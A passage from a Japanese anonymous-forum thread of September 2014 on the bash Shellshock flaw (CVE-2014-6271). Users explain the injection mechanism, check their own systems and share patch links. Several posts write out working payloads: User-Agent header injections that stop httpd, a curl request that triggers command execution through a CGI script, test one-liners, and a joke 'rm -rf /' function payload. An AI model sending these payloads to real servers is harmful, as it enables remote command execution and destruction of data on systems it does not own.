/bin/shがbashになってるディストリにとって
死刑宣告状態だから問題

153 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:29:34.15 ID:j9R1eaU90
>>147
あ 思い出した
万一パスワードがバレてログインされてしまった時のシェルとして作ったんだった

すっかり用途を忘れていた バッファオーバーフロー対策その他はきちんと作った

154 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:29:58.62 ID:i7W9vEwe0
>>150
確実なのは、mail関数がsendmail叩く時
systemさえ経由せずに、/bin/shしてたはず。
それ以外にもdbのドライバ系の組込みとかも怪しいはず。
まあ、そんなの使うのは全部古いシステムだけもね

155 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:30:12.42 ID:7DWgsPhx0
Linuxユーザーって、シェルスクリプトもbash前提で書いてるから、bash依存から抜け出すのは並大抵の労力じゃない
流行りものにすぐ手を出して、互換性をないがしろにするからこうなる

156 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:31:46.60 ID:G1pLUhPv0
~$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 2011-05-29 01:19 /bin/sh -> dash

なんだ、問題なかったのか

157 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:33:53.68 ID:DeeB+g2J0
>>154
PEAR系のライブラリは大丈夫なのか
使ってるが

158 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:34:58.05 ID:nvgmhtu40
/bin/shがbashにハードリンクされてたので、
/bin/shをzshにハードリンクしておいた

159 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:36:48.19 ID:sW9AH8cc0
リナァーックス!

160 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:37:46.97 ID:i7W9vEwe0
>>157
PEAR系は
PHPだけなら、実行時設定とかで守れそうかなあ?
Cのエクステンションとかは、コード読むしかない。

161 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:38:59.12 ID:oM8T22fPi
>>158
システムのスクリプト動かなくなるぞ

162 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:39:20.73 ID:1PSGFsmT0
php の mail 関数は今見たけど外部から弄れる要因は無いっぽい

163 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:39:47.16 ID:DeeB+g2J0
>>160
やっぱり、中見ないと何とも言えないのな
ありがとな

164 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:40:50.81 ID:oM8T22fPi
環境変数を受け継ぐことも必要条件なんでしょ?
mod_phpはCGI的な環境変数作るの?

165 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:42:02.02 ID:1PSGFsmT0
>>164
作らない

166 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:42:35.87 ID:G1pLUhPv0
自分以外のユーザのログインシェルは /bin/false か /bin/sh だろうと思ってたら
couchdb とかいうやつだけは /bin/bash だった。気持ち悪いので bin/shに変更しますた

まあ自宅LAN内からしか参照できない自分専用サーバだから関係ないけど・・

167 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:43:22.60 ID:9SqBZlis0
漢は黙ってcsh

168 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:43:55.30 ID:bUXwRpJz0
ボーンアゲインシェルシェル

169 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:45:07.54 ID:i7W9vEwe0
mb_send_mailは終わってるって話だけど
mailだと大丈夫とかいう大逆転?

170 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:45:41.45 ID:HqkSVee60
いたずらしたい人が、今一生懸命総当たりしてるんだろうな
会社のサーバが面白いことにならないことを祈ろう

171 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:46:45.73 ID:WZxQ4Lym0
よくわからん。
普通にWWWサーバー立ててphp動かしてるだけで危ないの?

172 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:48:39.64 ID:jQlRubmc0
bashは元々入れていない

173 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:49:16.64 ID:uJWXTkU90
レンサバどうしよ
暫定でもアップデートして/etc/profileにLD_PRELOAD追加しておけばいいの?

174 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:50:23.42 ID:i7W9vEwe0
>>171
cgiで動いてる。
サーバがCentOSとか
systemコールぽい関数使ってる

と、アウト

ぶっちゃけレンサバにクソ多そうな構成だよな。

175 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:50:38.66 ID:Mx7JmxW/0
これ簡単すぎてヤバイだろ…

176 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:51:30.98 ID:WZxQ4Lym0
メールアドレスを入れてもらうWWWフォームがあるけど止めておいた方がいいかな?
そのメールアドレス宛に確認メールが行くようになってる。
メールアドレスにエスケープ文字入れてごにゃごにゃされたらまずいのかなあ。

177 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:53:37.97 ID:WZxQ4Lym0
>>174
CGIは動かしてないけどCentOSだよ orz
systemコールはphpの中では使ってるけど、外から任意のコマンドは動かせないはず。

178 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:53:45.69 ID:i7W9vEwe0
>>176
環境変数経由の脆弱性で
http header細工されたらCGI勝手にぶっこむので終わり
アプリケーション層じゃほとんど防げない

179 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:56:08.05 ID:WZxQ4Lym0
>>178
え!?POSTの内容とかUserAgentになんか仕込まれたら終了ってこと!?
はええ〜

180 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 21:59:47.19 ID:L2RcW2/O0
よくわからんけどsshから攻撃されるとしたら不味くね?

181 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:00:46.48 ID:i7W9vEwe0
>>179
CGI http headerを勝手に環境変数に展開
system 環境変数を勝手に引き継いでsh(bash)コール
bash 環境変数内のコードを勝手に実行

なので、その上で動くスクリプト環境はほとんど何も関係ないから痛いんだな。

182 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:01:12.71 ID:Mx7JmxW/0
wget -U '(){ ignore me; }; mail -s "title" person@example.com <<< "Testing testing ABC"'

こんな感じかなあ

183 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:05:06.38 ID:Mx7JmxW/0
ああそっか
bash は
 () スペース一個 {
で始まる環境変数を関数だと認識するから
 (){
で始めるのはうまくいかないはず

184 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:08:43.99 ID:WZxQ4Lym0
>>181
ありがとう。だいぶ分かってきた。
CGIは使ってないから大丈夫かもしれないけど、OpenSSHは使ってるんだよなあ。

185 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:16:09.76 ID:TbmwrOwt0
またお客様から「ウチの環境だとbash入ってる?」って質問が来るな
OpenSSLの時も質問が来た

186 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:25:20.23 ID:OATOlKxx0
こんな簡単な手法なら知ってる奴は沢山いたんだろうな
bashが普及してから今まで一杯クラッキングされてたんだろうな

187 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:26:12.26 ID:UHJWJvsii
スラッシュドットだとこの話題よりもアニメの方が盛り上がってるな
本当にクズの集まりだわあそこ。「ギーク」って響きで集まって帰属意識持ってガチンコで気取ってる分チョンモー以下かもしれん

188 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:26:12.83 ID:eZMxin3Z0
>>85
>>111
うちにもこの2種類が来てた
他のヘッダーは調べてないのでもっと来てるかも

今日気づけてよかった…

189 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:29:06.90 ID:rXgDhIFO0
どうもcgiを外に向けてるサーバーをスキャンして教えてくれてる奴がいるらしいよ。
致命的過ぎるからか

190 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:30:32.50 ID:qONBTDNF0
これって無名関数でしょ?
bashに追加されたの最近じゃねーの?
最近でも何年かはたってるだろうが

191 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:30:51.40 ID:WZxQ4Lym0
OpenSSHとOpenSSLと勘違いしてたわ。ハハ

192 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:32:52.26 ID:p/HyQvYo0
>>177
>外から任意のコマンドは動かせないはず。
動かせるようになるという脆弱性なんだが
Linux系のOSでwebサーバ立ててるんならとりあえずアップデートした方が良さ気

193 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:37:13.91 ID:WZxQ4Lym0
bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた
http://d.hatena.ne.jp/Kango/20140925/1411612246

194 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:37:32.18 ID:NgD+J9t20
シェルスクリプトのcgiでわかりやすく実験している例
http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html
注:cgiがシェルスクリプトでない場合でもbashを呼んだらあうと

195 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:39:29.20 ID:kYpeNNBy0
今日降ってきたセキュリティパッチはこれか

libnssとfirefox以外にbashがあったから何事かと思った

196 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:42:00.16 ID:cWi3t9v10
>>81
でもLinuxにB-shellなんてないし。

197 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:42:13.66 ID:kYpeNNBy0
>>155
最近はだいぶdashに置き換わってんじゃないのか

198 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:42:40.42 ID:9WaxNgwX0
tcshです

199 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:47:12.69 ID:qyJS5Cmp0
ログインシェルにtcsh使ってるからって、/bin/shがtcshになるわけではないぞ

200 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:49:31.29 ID:csgl0Fga0
頭がボーンシェル

201 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:49:57.21 ID:BZUno0OZ0
>>193
よくわからん
% LANG="C" ls -l
とかやると、本来なら実行されないはずの"C"に書かれた
任意のコマンドが実行されちゃうってことか?

202 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:53:10.17 ID:/OlhBdLS0
ここまで簡単な脆弱性だと、今から対策しても手遅れだろうな
俺が侵入とかを商売にしてる立場だったらとっくに世界中で踏み台確保してるわ

203 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:55:17.79 ID:ia3s84NX0
User-Agent: () { :; }; yum update bash

204 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:55:57.16 ID:MoKk+Vv70
個人ユーザはかーんけいないもーんだいないでしょ

205 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:56:43.09 ID:k6JfiWnP0
*nixはsh以外のリッチなシェルを1個共通して採用しろよ
bashだのkshだのtcshだのわけわかんね

206 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:57:11.76 ID:+t9rWNo40
企業は大変だね
俺も他人事じゃないけど

207 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:57:38.39 ID:G+olw0YX0
MacOSXも対象

スタバでドヤ顔Airしてるオシャレメガネのアレもね

208 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:58:03.21 ID:/je2+7Yii
これ話題になってるけど何が何やら分からん
やっぱプログラマーって凄いな

209 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:58:23.70 ID:kYpeNNBy0
macとか無駄に鯖が上がってそうだな

210 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 22:59:37.49 ID:8hccaY1w0
俺のcygwinのけつのあなもふさがりそうです

211 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:00:12.90 ID:qNbOg9sO0
>>210
その報告はいいです

212 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:01:12.71 ID:pxFE+/+P0
>>201
環境変数に
>>203みたいな細工された文字列+実行したいコマンドを紛れ込ませてbashが呼ばれると
そのまま実行される

早い安い旨いの3拍子揃った脆弱性

213 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:01:15.59 ID:vxuT6vHa0
kshの俺高みの見物

214 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:02:07.75 ID:MXKc6UiP0
User-Agent: () { :; }; /etc/init.d/httpd stop

215 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:02:30.64 ID:bJaCl9kX0
>>3
鯖屋はむしろセキュリティアップデートには素早く追従する体制整えてるだろう
Linuxなんてそういうもんなんだから

216 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:04:32.11 ID:BZUno0OZ0
>>212
環境変数って
ひょっとしてhttpdの$QUERY-STRINGがアウアウってこと?wwwww

217 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:05:29.23 ID:W+rX/OnL0
>>201
環境変数に無条件で関数を埋め込めるようにしたバカが居たんだそうだ
なもんで、"C"の部分に{ :};関数(何もしないでtrueを返す関数)を差し込むとさらにその次に差し込んだコードを自由に実行出来るようになったみたい

つまり{ :}; sudo なんちゃら を、与えられた文字列をsystem関数に無条件に渡すsudoersに登録された権限で動くCGIとかに食わせるとやりたい放題って事

218 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:05:52.03 ID:NgD+J9t20
>>210
Cygwinのbashもアップデートされた
後から見つかったCVE-2014-7169は多くのLinuxディストリビューションと同様で塞がってない

219 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:06:06.71 ID:uH8ZGyD00
久々にmacports使ったらエラー起きた しね

220 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:06:24.19 ID:kYpeNNBy0
世の中にはbashで書いたhttpdとかあるらしいけどそんなのを運用してたら凄いことになってそうだな

221 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:06:50.27 ID:W+rX/OnL0
>>216
実行出来ればなんでもござれだよ
環境変数に突っ込まれるんだからBashが起動する度に環境変数が評価される=埋め込まれたコードが実行されてしまう

222 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:09:33.00 ID:pxFE+/+P0
>>216
別になんでもいいんだぞ
>>203のようにHTTP_USER_AGENTでもいいし
HTTP_COOKIEでもいい
httpdである必要もない

環境変数がいじれてbashが呼べる
この2つさえ揃えば好きなコマンドが実行できる

223 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:13:03.17 ID:G+olw0YX0
>>222
変な声がでた

224 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:17:59.12 ID:zMthAAzI0
やっぱlinuxは糞だな

225 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:30:03.76 ID:xa8B9mTf0 ?S★(711000)

>>207
Macも脆弱である。
アップデートの手順はこちらです。
http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7

226 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/25(木) 23:35:29.50 ID:WqHyN23p0
coderedを思い出すね。
アレはビックらこいた

227 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 00:15:01.64 ID:dXQ6qXBB0
ここに書いてあることがさっぱり分からない
どうしたらこういうのに詳しくなれるの?

228 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 00:24:04.96 ID:GvXNUaOZ0
http://blog.ueda.asia/?p=3967
かいせつ

229 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 00:32:49.48 ID:0j9j6Lxt0
>>227
http://www.atmarkit.co.jp/ait/subtop/linux/

230 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 00:35:59.42 ID:A9s1poov0
>>228
グダグダやがな。

231 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 00:56:16.52 ID:qrq8oz780
$ ENV_PARAM='() { :;}; echo vulnerable' bash -c 'date'
vulnerable
2014年 9月 26日 金曜日 00:54:12 JST

うちのcygwinでもできたよ

232 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:00:50.62 ID:aCrEv8Lm0
決断力のある世界「何かが動かなくなってもいいからbashを使えなくしろ」
ジャップ「全業務のテストをしてからでないとセキュリティパッチは当てられません」

233 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:03:14.79 ID:JLwSLl9/0
ドヤ顔マカはbashなんて見たことも聞いたこともないだろうね
ウェブでハックとか書かれてるのを見てドヤ顔でターミナル立ち上げたときに起動はしただろうけど

234 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:04:27.95 ID:sT892xBX0
#とかだっせーだろ
%だろ%

235 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:05:53.26 ID:HlUpXJig0
とりあえず、おれが管理してるとこは更新しといた

236 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:07:17.46 ID:+ZtszHy30
この前のハートブリードとかいうのとどっちがヤバいの?

237 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:13:46.69 ID:tBSpNZf10
>>236
heartbleed = 使ってたメモリの残骸のどこかを少しだけ読み出される、宝探し
これ = 任意のコマンド実行

おわっg

238 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:17:35.53 ID:cDgXKoPG0
リッの立場は……

239 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:19:46.90 ID:qrq8oz780
$ env | grep SHELL
SHELL=/bin/bash
$ ENV_PARAM='() { :;}; exec -c /cygdrive/c/cygwin64/bin/date.exe' bash -c ':'
Fri Sep 26 01:17:44 2014

実行させるとなると結構めんどくさいな
これで正解かね

240 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:24:49.18 ID:X6VCJPjx0
>>53
ちげーよ
> os.system("df -h") # OMG
がAUTO

241 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:25:27.19 ID:fyvp/j/60
鯖屋ばたばたしてたのこれがげいいんか

242 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:34:26.39 ID:WEgnt6/m0
何にせよこれで環境変数に対するサニタイジング手法と
穴を狙った超絶アクロバティック技法が磨かれることになる

不特定多数が勝手に送りつけてくる文字列を権限持ったシェルが読み取るなんて
よく考えてみればマジキチな状況だしな

243 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:34:38.39 ID:A9s1poov0
おわっgナクス

244 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:37:57.18 ID:oR0ftdsw0
アップデートおわた

245 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:38:30.05 ID:Hq8xwcB50
あ、意外とヤバいなこれ
知らん間に色々仕込まれてそう

246 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:39:35.88 ID:HOm6M6VX0
そもそも環境変数で関数定義するってどういう時に使うの

247 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:43:24.55 ID:aCrEv8Lm0
system()を使ってるケースで阿鼻叫喚な連中が多いな

可哀想に

248 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:46:30.93 ID:JLwSLl9/0
普通はexecveだよね
まあそもそもbashじゃなくてbusyboxしかやってないけど

249 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:47:42.03 ID:oR0ftdsw0
glob使うとsystem()でシェル呼び出してた言語あったよね

250 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:49:04.07 ID:nP0Rh44S0
Bシェルでいいだろ

251 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:51:11.29 ID:qrq8oz780
$ cat perl_test.pl
#!/usr/bin/perl

system( "env | grep SHELL" );
system( "ENV_PARAM='() { :;}; exec -c /usr/bin/date.exe' bash -c ':'" );

これでperl経由でも確認できたけどsystem()なんて使ってるやつおるん?

252 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:51:45.49 ID:aCrEv8Lm0
>>250
残念Linuxのshはbashのシンボリックリンクだ

253 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:53:35.18 ID:oR0ftdsw0
>>252
それはディストリによる
Red Hatはそうだけどな
しかしこれアップデート当てない馬鹿多いんだろうな
またbotnetとDDoS攻撃が捗るわけだ

254 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 01:59:12.82 ID:A9s1poov0
これもう、クラッカーに転職した方が幸せになれるんじゃないかな。
一度入り込めたらNASとかも操作できそう。

255 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 03:43:00.53 ID:qnaiYN1i0
>>1
マジっすか、仕事増える・・・

256 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 03:50:46.68 ID:BYvt0LdK0
バージョンいくつならセーフなんだ

257 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 04:33:47.59 ID:qrq8oz780
$ cat /srv/www/cgi-bin/test-cgi-perl
#!c:/cygwin64/bin/perl.exe

printf "Content-type: text/plain; charset=iso-8859-1\n\n";
system ("df -h | grep cygwin");

$ curl -A "() { :;}; echo Content-type:text/plain;echo;exec -c /usr/bin/date.exe" http://localhost/cgi-bin/test-cgi-perl
Content-type:text/plain

Fri Sep 26 04:27:57 2014

言語によりそうだけどperlのCGIがsystem ("df -h")だと再現しないな、パイプ使うときに何か裏でやってんのかね

258 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 04:41:44.66 ID:MHDHmW+p0
シェルで書いたcgi動かしているサイトなんて今時あんの?
phpとかのsystem関数系にユーザからの入力を何も検証しないで
渡してるサイトなんてあんの?

259 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 05:07:42.15 ID:7QYC8Pbp0
一回アクセス来ていたけどcgiはbashじゃないしsystemもしてなかったからセーフ
危ない危ない

260 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 05:17:10.70 ID:3NBzW13H0
>>190
違う。これは普通の関数

(bash の上で)
function func() { echo hello; }
export -f func # func() をエクスポート
dash # bash以外のシェルに入る
echo $func
 => '() { echo hello; }'

bash は関数をエクスポートするときに、この形式で環境変数に格納してる
逆に、bash が起動したとき、この形式の値になってる環境変数は関数として解釈する

(bash の上で)
export func='() { echo hello; }'
func # 実行できない (bash 内部で関数と変数は別に管理されてるから)
exec bash # bash に入りなおす
func # 実行できる (環境変数を経て受け渡しされたことで関数と変数の区別がしなおされた)

ここまではよく知られてること

261 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 05:21:27.03 ID:1pHrLeo90
解決したら呼んでくださいね

262 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 05:23:50.39 ID:3NBzW13H0
で今回何がびっくりかというと
関数定義の後ろに余計な文が書いてあるとそれも実行されちゃうということ

多分親プロセスがexportした関数をロードするとき
内部的に eval function func "$func" みたいな感じでしてるからだと思う

だから export -f func='() { 普通の関数定義; }; 余計な文'
みたいになってると、bash が起動時にこれを eval して余計な文が実行されちゃう

263 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 06:23:48.22 ID:hnvRyd/t0
安心のubuntu

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 4月 29 22:33 /bin/sh -> dash

$ ENV_PARAM='() { :;}; echo vulnerable' bash -c 'date'
bash: 警告: ENV_PARAM: ignoring function definition attempt
bash: `ENV_PARAM' の関数定義をインポート中にエラーが発生しました
2014年 9月 26日 金曜日 06:21:48 JST

264 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 06:30:20.51 ID:Nx+V3m9C0
こんなあからさまなバグが見過ごされてたって何なの
Linuxのシェル作ってる人たちってOSSコミュニティの頂点にいる超優秀なプログラマーじゃなかったの?

265 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 06:36:17.16 ID:MlKkrh560
FreeBSDでzshだから問題ない

266 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 06:49:27.84 ID:b/fu03wG0
やべ、メンテ忘れてた

267 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 06:55:36.30 ID:p/mPaHMr0
せんとくんだからzshですし・・・。
誰が困るのこれ?

268 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 07:02:14.27 ID:NrjVR8Af0
>>267
せんとくん上で動かしてるサービスは/bin/sh使ってんじゃないの?

269 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 07:13:48.37 ID:QMUCijiV0
なんだよ全然ヤバくねーじゃん
Windowsを東南アジアとするとLinuxは天狗熱で大騒ぎするジャップみたいだな

270 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 07:56:53.86 ID:+EZrmeVa0
クロネコヤマトのサービス、緊急メンテ入ってるのはこれのせいだったのかね?
https://cmypage.kuronekoyamato.co.jp/portal/entrance

271 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 07:58:51.41 ID:GVQBTv320
き・・・脆弱性

272 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 08:27:34.49 ID:l7M/4FEo0
今日の3時から地道にあてた
>>111はうちも有ったな
報告メンドイ

yumできる環境で構築するか
ansible入れて作業を楽にしたいね

とりあえずもう一回やるのか

273 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 08:33:22.31 ID:P6IAQUkJ0
lumixがlinuxで動いててbashがヤバいに見えた(´・ω・`)

274 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:00:53.08 ID:breEWeBl0
単純にアップデートできないな
シェル動かなくなる可能性あるし

275 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:17:40.56 ID:gxKFnb1B0
さりげなくジムがおってわろた

276 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:23:42.65 ID:kJ4O/TmG0
>>1のようなイレギュラーなコード書いてなけりゃbugfixだから影響ないよ

277 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:27:36.88 ID:l7M/4FEo0
VMwareのbashもこの脆弱性にヒットするかもなあ
まあ、外部からアクセスできんし、こっちは問題ないわ

278 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:30:49.94 ID:r5uKaSL2i
LFSで緊急用のブートCDを作っとけば問題ないだろ

279 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 09:53:45.70 ID:2IJei63n0
Windows Serverに死角はなかった

280 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:05:31.16 ID:SIk3bgg/0
>>279
こないだのアップデートで死んだ鯖あったんだがなにか言うことはないかね?

281 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:08:38.96 ID:JUpOKwWX0
echo='() { /bin/rm -rf /; }' とか絶対するなよ。

282 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:44:28.19 ID:1Adck5yR0
>>281
でも大丈夫、そう、Androidならね。


泥端末使ったスリム鯖とかは流石にないよな?

283 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:47:09.95 ID:Jdxp7R+50
実際攻撃されたかどうかは
なんてgrepすればいいん?
pingは確認した

284 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:54:55.63 ID:zBhZWoSU0
>>281
最近はブロックされるんじゃなかったか

285 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 10:57:07.42 ID:LybMWC6v0
ubuntu今朝またパッチきてたな

286 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 11:04:17.60 ID:l7M/4FEo0
>>283
wgetで何かダウンロードされてないか、確認したら?

287 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 11:30:59.81 ID:xUXAbHWp0
>>111
うちにもきてたな。
ここ見るための中間鯖にしてるやつ
aptで上がらんし手でやるか…

288 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 11:32:50.29 ID:Vc2Gpl+X0
パッチでも駄目みたいだな

289 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 11:56:13.37 ID:Ny1cy2/m0
ここ数年はWindowsでこういう致命的なのは見つかってない?

290 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:07:30.42 ID:k25UKa950
Debian wheezy (7.0/stable) 更新

Debian -- Security Information -- DSA-3035-1 bash
https://www.debian.org/security/2014/dsa-3035

291 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:16:16.24 ID:mlQaMnKd0
自宅鯖更新しといた

292 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:19:21.28 ID:fLa14sJ20
このスレの会話が分かるような人材になりたい…

293 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:22:45.32 ID:yNUBPzbA0
大半は「大変だー更新しなきゃー」レベルの理解だと思うよ

294 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:36:33.46 ID:e8fbbXXO0
